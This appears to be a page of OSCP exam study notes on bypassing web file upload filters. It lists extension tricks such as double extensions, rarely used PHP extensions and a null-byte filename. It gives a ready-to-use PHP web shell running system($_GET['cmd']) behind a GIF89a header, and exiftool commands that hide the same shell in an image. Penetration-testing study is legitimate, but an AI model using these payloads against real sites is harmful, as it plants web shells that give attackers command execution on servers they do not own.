Bypass file upload filtering

Bypass file upload filtering | OSCP Notesgabb4r.gitbook.io

Bypass file upload filtering

• Rename it

  • upload it as shell.php.jpg

• Blacklisting bypass, change extension

  • php phtml, .php, .php3, .php4, .php5, and .inc

  • bypassed by uploading an unpopular php extensions. such as: pht, phpt, phtml, php3, php4, php5, php6

  • asp asp, .aspx

  • perl .pl, .pm, .cgi, .lib

  • jsp .jsp, .jspx, .jsw, .jsv, and .jspf

  • Coldfusion .cfm, .cfml, .cfc, .dbm

• Whitelisting bypass

  • Bypassed by uploading a file with some type of tricks,

  • Like adding a null byte injection like (shell.php%00.gif ).

    Or by using double extensions for the uploaded file like ( shell.jpg.php)

• GIF89a;

  • If they check the content. Basically you just add the text "GIF89a;" before you shell-code.

    Copy

    GIF89a;            
    <?            
    system($_GET['cmd']);//or you can insert your complete shell code            
    ?>

ExifTool

Copy

1. <?php system($_GET['cmd']); ?>  //shell.php

2. exiftool "-comment<=shell.php" malicious.png

3. strings malicious.png | grep system

.htaccess File

How to execute php files with .html extension?Stack Overflow